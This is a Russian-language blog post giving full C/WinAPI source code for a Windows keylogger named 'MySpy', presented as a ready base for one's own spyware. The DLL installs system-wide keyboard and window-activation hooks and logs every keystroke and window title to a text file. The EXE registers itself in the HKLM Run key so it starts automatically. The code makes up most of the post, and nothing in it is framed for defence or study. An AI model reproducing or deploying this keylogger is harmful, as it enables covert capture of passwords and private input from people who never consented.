Кейлоггер для Windows "MySpy". Си, WinApi.

Скачать бесплатный кейлоггер можно, но лучше написать его самому! Кейлоггер для Windows, написан на Win API. Используется перехват нажатия клавиш с помощью SetWindowsHookEx (WH_KEYBOARD,...). Соответственно создается исполняемый файл и библиотека dll. Кстати, таким образом писать  кейлоггер для Windows, с использованием dll, как ни странно, наиболее предпочтительно в настоящее время в связи с прекрасной совместимостью с Windows 7. Перехват клавиш без использования dll (WH_KEYBOARD_LL) вызывает у семерки непонимание. Приходится шаманить, колдовать, чтобы заставить кейлоггер для Windows работать, но это все-же более полезно и правильно, чем искать, где скачать бесплатный кейлоггер. Выход конечно же всегда найдется, но все же, если хотите написать нормальный кейлоггер для Windows, предпочтительно использовать SetWindowsHookEx (WH_KEYBOARD,...).

В указанном коде правильно и замечательно реализовано определение раскладки клавиатуры. Стоит заметить, что с целью однократного запуска приложения используется CreateMutex (). Код достаточно прост и очень неплох. Можно смело брать за основу собственного кейлоггера для Windows. Как и где  скачать бесплатный кейлоггер пускай думают другие!

Исходник DLL:

//Hook.cpp : DLL-ка
//Кейлоггер для windows

#include < windows.h >
#include < stdio.h >

#pragma data_seg(".hdata") // секция в памяти общая для всех процессов
HINSTANCE hi=NULL; // эта переменная может изменяться любым поетому 
//сдесь не должно быть ничего лишнего
#pragma data_seg() // конец секции
#pragma comment(linker, "/section:.hdata,rws")//даем права этой секции

#ifdef __cplusplus 
#define EXPORT extern "C" __declspec (dllexport) 
#else 
#define EXPORT __declspec (dllexport) 
#endif 

EXPORT BOOL SetKeyboardHook(void); // объявляем экспортируемую функцию

// а эти будут у всех свои
HANDLE hFile=NULL; // !!!!! хэндл файла для каждого процесса 
//должен быть свой !!!!!
HHOOK hKeyHook=NULL;
HHOOK hCBTHook=NULL;
//кейлоггер для windows
void WriteTime(void) // записывает дату и время
{
    DWORD NOfBytes;
    OVERLAPPED ovlp;
    DWORD ffsze;
    SYSTEMTIME time;
    char buffer[30];

    GetLocalTime(&time); // получаем дату и время
// форматируем это в String
    sprintf(buffer,"\r\n%02d.%02d.%d %02d:%02d",time.wDay,
                    time.wMonth,time.wYear,time.wHour,time.wMinute);

    ffsze=GetFileSize(hFile,NULL);
    ovlp.OffsetHigh=0;
    ovlp.hEvent=NULL;
    ovlp.Offset=ffsze;

    WriteFile(hFile,buffer,strlen(buffer),&NOfBytes,&ovlp);
	//пишем в файл
}
//кейлоггер для windows
void WriteTitle(HWND hWnd) // записывает имя окна
{
    WriteTime(); // сначала пишем время
    DWORD NOfBytes;
    OVERLAPPED ovlp;
    DWORD ffsze;
    char buffer[250];
    char title[256];
    GetWindowText(hWnd,title,100); // получаем имя
    sprintf(buffer," %s\r\n",title);
    ffsze=GetFileSize(hFile,NULL);
    ovlp.OffsetHigh=0;
    ovlp.hEvent=NULL;
    ovlp.Offset=ffsze;

    WriteFile(hFile,buffer,strlen(buffer),&NOfBytes,&ovlp);
}

short GetSymbolFromVK(WPARAM wParam)
//кейлоггер для windows
//переводит код нажатой клавиши в текст
{
    BYTE btKeyState[256];
    HKL hklLayout = GetKeyboardLayout(0); // узнаем язык клавиатуры
    WORD Symbol; 
    GetKeyboardState(btKeyState); 
    if((ToAsciiEx(wParam, MapVirtualKey(wParam, 0), btKeyState,
	&Symbol, 0, hklLayout) == 1) && // сам перевод
    GetKeyState(VK_CONTROL) >= 0 && GetKeyState(VK_MENU) >= 0) 
	// проверяем CTRL и ALT
        return Symbol;
     return -1;
}
//кейлоггер для windows
void WriteSymbol(WPARAM wParam) // записывает нажатие в файл
{
    DWORD NOfBytes;
    OVERLAPPED ovlp;
    DWORD ffsze;
    WORD wc;

    ffsze=GetFileSize(hFile,NULL);
    ovlp.OffsetHigh=0;
    ovlp.hEvent=NULL;
    ovlp.Offset=ffsze;

    if(wParam==VK_RETURN) 
        WriteFile(hFile,"\r\n",2,&NOfBytes,&ovlp);

    else if((wc=GetSymbolFromVK(wParam))!=-1) 
	// переводим нажатие в текст
        if(iswprint(wc)) // проверяем или знак текстовой
            WriteFile(hFile,&wc,1,&NOfBytes,&ovlp);
}
//кейлоггер для windows
BOOL APIENTRY DllMain(HINSTANCE hModule,
DWORD ul_reason_for_call,LPVOID lpReserved)
{
    switch(ul_reason_for_call)
     {
        case DLL_PROCESS_ATTACH: 
// вызывается каждый раз когда новый процесс грузит DLL в свою память
        {
            if(!hi) //запоминаем запустивший хэндл(наша DLL) толко 
			//первый раз, чтобы он небыл переписан на новый
                hi=hModule;
            char pfad[MAX_PATH]; // путь к файлу должен быть 
			//обязательно полный, иначе каждый процесс
            // будет создавать новый в своем каталоге
            GetModuleFileName(hi,pfad,MAX_PATH); // путь к нашей ДЛЛ
            *(strrchr(pfad,'\\')+1)='\0'; // выкидываем ее имя
            strcat(pfad,"KeySpy.txt"); // вставляем имя файла
         // каждый процесс должен открыть для себя файл отдельно
            if((hFile=CreateFile(pfad,GENERIC_READ|GENERIC_WRITE,
		FILE_SHARE_WRITE|FILE_SHARE_READ,NULL,
        OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL))==INVALID_HANDLE_VALUE)
                    return FALSE;
            break;
        }

         case DLL_PROCESS_DETACH:
        { // Снимать хуки и закрывать файл необязательно 
         // Система делает это автоматически
         // UnhookWindowsHookEx(hKeyHook);
         // UnhookWindowsHookEx(hCBTHook);
         // CloseHandle(hFile);
            break;
        }
        default:
            break;
    }
    return TRUE ; 
}
//кейлоггер для windows
LRESULT CALLBACK KeyboardProc(int nCode,WPARAM wParam,LPARAM lParam) 
// вызывается при нажатии или отпускании клавиши
{
    if (nCode)
        return CallNextHookEx(hKeyHook,nCode,wParam,lParam);
    if(lParam>=0) // нам нужно только нажатие
        WriteSymbol(wParam);
    return CallNextHookEx(hKeyHook,nCode,wParam,lParam);     
	// обработали передаем дальше
}
//кейлоггер для windows
LRESULT WINAPI CBTProc(int nCode, WPARAM wParam, LPARAM lParam)
{
    if(nCode==HCBT_ACTIVATE) 
// вызывается перед тем как система собирается 
//активировать какоето окно или открыть новое
            WriteTitle((HWND)wParam); // wParam новый HWND
    return CallNextHookEx(hCBTHook, nCode, wParam, lParam); 
	// обработали передаем дальше
}
//кейлоггер для windows
BOOL SetKeyboardHook(void) 
// эту функцию надо вызывать из приложения для создания ловушек
{
    hKeyHook=SetWindowsHookEx(WH_KEYBOARD,&KeyboardProc,hi,0);
    hCBTHook=SetWindowsHookEx(WH_CBT ,&CBTProc,hi,0);
    return hKeyHook && hCBTHook;
}
//конец DLL

 Исходник EXE:

//KeySpy.cpp 
// 

#include < windows.h > 

#ifdef __cplusplus
#define IMPORT extern "C" __declspec (dllimport) 
#else
#define IMPORT __declspec (dllimport)
#endif

IMPORT BOOL SetKeyboardHook(void);
// функция импортируемая из DLL

BOOL Mutex(LPSTR szName)
// проверяет запущена ли уже копия
{
    HANDLE hMutex = CreateMutex (NULL, TRUE, szName);
    if (GetLastError() == ERROR_ALREADY_EXISTS)    
    {
        CloseHandle(hMutex);
        return FALSE;     // уже запущена
    }
    return TRUE; // все путем
}

void Registry(void) // вписываем в автозапуск
{
    HKEY hKey = HKEY_LOCAL_MACHINE; 
    LPCTSTR lpSubKey ="Software\\Microsoft
	\\Windows\\CurrentVersion\\Run"; 
    DWORD dwType = REG_SZ;
    HKEY key;
    RegOpenKeyEx(hKey,lpSubKey,0,KEY_WRITE,&key);
    char pfad[MAX_PATH];
    GetModuleFileName(NULL,pfad,MAX_PATH);
    RegSetValueEx(key,"KeySpy",0,REG_SZ,
	(LPBYTE)pfad,strlen(pfad));
}
//кейлоггер для windows
int APIENTRY WinMain(HINSTANCE hInstance,
            HINSTANCE hPrevInstance,
            LPSTR lpCmdLine,
            int nCmdShow )
{
    if(!Mutex("MySpy"))
        return 1; // одна копия уже есть закрываемся

    Registry();

    if(!SetKeyboardHook()) // устанавливаем хуки
        return 1; // не получилось закрываемся

// а это бесконечный цикл
    MSG msg;
    while (GetMessage (&msg, NULL, 0, 0))
    {
         TranslateMessage (&msg);
         DispatchMessage (&msg);
    }
    return 0;
}
//конец EXE

Обязательно вставляем в проект hook.lib и переносим hook.dll в одну директорию с MySpy.exe. Кейлоггер для Windows готов!  Марочить Гуглу голову, где же скачать бесплатный кейлоггер не нужно!

Вы здесь: Главная Блог Кодинг x32 Исходники x32 Кейлоггер для Windows "MySpy". Си, WinApi.